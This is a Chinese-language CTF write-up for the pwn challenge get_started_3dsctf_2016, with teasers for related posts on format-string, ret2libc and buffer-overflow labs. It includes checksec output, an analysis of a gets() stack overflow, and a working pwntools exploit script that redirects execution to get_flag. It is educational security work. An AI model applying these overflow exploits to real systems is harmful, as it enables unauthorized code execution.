get_started_3dsctf_2016 WriteUp
考点
- 对栈溢出函数带参数的溢出理解
解题内容
使用
checksec工具查看基本信息:1
2
3
4
5
6
7❯ ~/.local/bin/checksec ./get_started_3dsctf_2016
[*] '/home/bronya/Documents/ctf/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)可以看到为32位程序,只开了nx防护。
ida工具打开程序,反编译,有主要函数
main,get_flagmain:get_flag:存在漏洞点为
main函数中的gets(v4),因此可以通过此进行栈溢出将返回地址改为get_flag函数地址,获取flag在本地测试成功,但是进行远程测试出现问题,发现远程程序崩溃了,应该是因为栈的数据被破坏,导致程序无法完整运行:
考虑在
get_flag后加上exit函数以及get_flag所需的两个参数,使其正常完成并退出。构造python脚本如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16from pwn import *
context(arch="i386", log_level="debug")
p = process("./get_started_3dsctf_2016")
# p = remote("node4.buuoj.cn", 25523)
get_flag = 0x080489B8
exit = 0x0804E6A0
retn = 0x08048A40
a1 = 0x308CD64F
a2 = 0x195719D1
# gdb.attach(p, 'b *0x8048A3B')
payload = flat(b'a'*56, get_flag, exit)
p.sendline(payload)
p.interactive()成功获取flag
另外还有一种思路是程序中存在mprotect函数,可以修改程序中某一段地址的读写执行权限,因此可以将某段bss地址修改,并写入shellcode,令程序跳转到bss地址即可拿到shell。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Small Utopia!
相关推荐
.jpg)
2023-10-23
BUUCTF 第五空间PWN5
考点 格式化字符串漏洞 解题过程 首先使用checksec工具查看基本信息 为32位,canary,dep防护 使用ida工具进行静态分析。 main main函数主要代码如上图所示,可以看见print((int)v7)存在格式化字符串输出漏洞,因此可以考虑进行利用(注:由于输入read限制了输入长度,导致无法通过泄漏canary方法来进行栈溢出攻击。) 构造python脚本如下,主要思路为修改printf的got表plt地址为要执行的代码地址(若开启full relro则无法使用),然后再代码执行到下一次调用printf函数时会转去执行目标代码。获得shell。 1234567891011121314151617181920from pwn import *context(arch="i386", log_level="debug")# p = process("./pwn")p = remote("node4.buuoj.cn", 29338)elf =...
.jpg)
2023-11-20
【SEED Lab2.0】Return_to_Libc实验报告
Task1:Finding out the Addresses of libc Functions 获取system函数和exit函数地址 gdb批处理命令,新建文件peda-session-retlib.txt,进行批处理操作 Task2:Putting the shell string in the memory 编写getprt.c来获取环境变量地址 getprt.c: 12345678#include<stdlib.h>#include<stdio.h>void main(){char* shell = getenv("MYSHELL");if (shell) printf("%x\n", (unsigned int)shell);} 设置/bin/sh的环境变量,获得地址: 将代码加入到retlib.c中,获取到地址,可以发现地址与getprt的地址相同。(如果开启aslr或者两文件名长度不同则会不同) Task 3: Launching the...
.jpg)
2023-12-11
【SeedLab】格式化字符串实验报告
1 Overviewprintf函数用于根据指定格式打印出字符串,第一个参数诶格式化字符串format string,格式化字符串中使用了%来作为占位符。如果不使用%占位符而是直接将变量放入格式化字符串,则存在格式化字符串漏洞,可能被恶意利用。 2 Environment Setup2.1 Turning of Countermeasure关闭ASLR 12❯ sudo sysctl -w kernel.randomize_va_space=0kernel.randomize_va_space = 0 2.2 The Vulnerable Program漏洞程序如下 format.c:myprintf存在漏洞printf(msg); 1234567891011121314151617181920212223242526void myprintf(char *msg){#if __x86_64__ unsigned long int *framep; // Save the rbp value into framep asm("movq...
.jpg)
2023-10-25
【SEED Lab2.0】缓冲区溢出实验报告
stack_overflow(setuid)环境配置配置环境,关闭ASLR地址随机化,将/bin/sh链接到/bin/zsh(/bin/dash以及/bin/bash都实现了一种安全对策, 防止自己在Set-UID进程中执行。 基本上,如果它们检测到它们是在一个Set-UID进程中执行的, 它们会立即将有效的用户ID更改为该进程的真实用户ID, 基本上会放弃特权 ) 123❯ sudo sysctl -w kernel.randomize_va_space=0 kernel.randomize_va_space = 0❯ sudo ln -sf /bin/zsh /bin/sh Task1: 熟悉shellcodeshellcode C代码实现: 12345678#include <stddef.h>void main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; ...
.jpg)
2024-10-22
2024 ZJUCTF WriteUp
本次校赛题目质量不错,难度设置比较合适,属于是看到感觉可以试一试的程度。其中*A口算很有趣!强烈推荐!!! MISC小A口算该题目会随机生成20以内的数字比较,可以构造脚本在1分钟内刷够足够分数,从而获取flag exp 123456789101112131415161718192021222324252627282930from pwn import *context(arch='amd64', log_level='debug')# p = process('./arithmetic')p = remote('127.0.0.1', 38981)p.recvuntil("Input your choice:")p.sendline('1')p.recvuntil('Try your best to answer questions as much as possible!\n')for i in range(150): ...
.jpg)
2024-10-28
2024-Beichen-CTF-WP
今年暑假参加了信大举办的北辰计划夏令营,其中最后一天举行了一次CTF比赛,第一批的题目比较难,当时没做出来,现在重新做一下,在此记录。 PWNPWN1题目描述 首先读取输入,判断输入与加密后的字符串,成功才能进入漏洞函数:直接动态调试可以得到输入应为I_can_find_the_right_path\n,然后进入存在漏洞函数; 漏洞函数会首先打开flag文件,将flag读入到堆上,并且关闭了flag文件描述符,然后使用seccomp开启沙箱保护,只允许read和write,exit(这里有点问题,好像不能直接用syscall的gadget,会直接报错bad system call,知道的师傅可以解释一下QWQ)。然后漏洞函数读取0x40字节,可以溢出0x10字节。 思路 首先可以通过构造fake stack来写入更大长度的rop链,分为两步,第一步覆盖rbp为想要写入的伪栈地址,然后重新返回到vuln_addr+8(如图,要跳过push rbp,mov rbp,rsp),第二步向伪栈写入内容,然后leave ret即可实现栈迁移。 脚本如下: 1234567# step1:...
评论